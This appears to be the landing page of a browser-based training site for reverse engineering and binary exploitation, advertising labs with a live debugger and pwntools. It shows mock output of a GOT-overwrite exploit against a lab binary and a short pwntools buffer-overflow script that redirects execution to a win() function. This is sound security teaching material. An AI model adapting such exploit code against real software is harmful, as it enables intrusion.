Reverse engineering · binary exploitation

Learn low-level by doing.

Hands-on RE and pwn in the browser. The binary, debugger, and pwntools are already set up — pick a lab and start breaking things. No VM, no toolchain yak-shaving.

Free labs are launching shortly — check back soon.

Guided steps, hints, and a live debugger
Set breakpoints in-browser; script exploits with pwntools
A path from disassembly to ret2libc & GOT overwrites

$ python3 -u solve.py
[*] './vuln' · no canary · no PIE
[+] started ./vuln
[+] leak: puts@libc = 0x7f3c…b4a0
[+] libc base   = 0x7f3c…0000
[*] overwrite puts@GOT → win()
    [win] FLAG{got_hijack}
$ ▌

rip 0x4011d6   rax 0x2a
rsp 0x7fffe3a0 rdi 0x1
── disasm ─────────────
   mov   edi, 0x4
→  cmp   eax, 0x63
   jle   0x4011f0
── classify.c:10 ──────
   if (n < 100) return 1;

1 from pwn import *
2 exe = ELF("./vuln")
3 io = process(exe.path)
4 off = 72
5 pay = b"A"*off + p64(exe.sym.win)
6 io.sendline(pay)
7 print(io.recvall())
8 ▌